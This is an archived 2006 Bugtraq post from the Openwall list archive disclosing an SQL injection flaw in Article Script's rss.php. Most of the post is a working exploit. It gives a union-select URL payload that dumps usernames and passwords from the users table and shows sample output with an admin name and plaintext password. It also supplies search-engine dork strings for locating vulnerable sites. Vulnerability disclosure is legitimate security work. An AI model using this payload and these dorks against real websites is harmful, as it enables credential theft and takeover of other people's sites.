| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 6 Nov 2006 00:35:08 -0000 From: liz0@...mail.org To: bugtraq@...urityfocus.com Subject: Article Script v1.*and v1.6.3 Sql injection Article Script v1.*and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:liz0@...mail.org Baba Kimdir? Tabiki Liz0ziM ------------------------------------------------------------ :D http://www.victim.com/articles/rss.php?category= ' sql İnjection Example: http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/* <title>admin4521title> ------> Admin name :admin4521 <link>http://www.victim.com/articles/cs1120/page_1/link> ----------> Admin password cs1120 Dork: "Powered by Article Script" ":: Article Script - New User Article ::" intitle:":: Article Script -" "Last Articles::" Greatz My all friend Source: http://www.blogcu.com/Liz0ziM/1312100/
Powered by blists - more mailing lists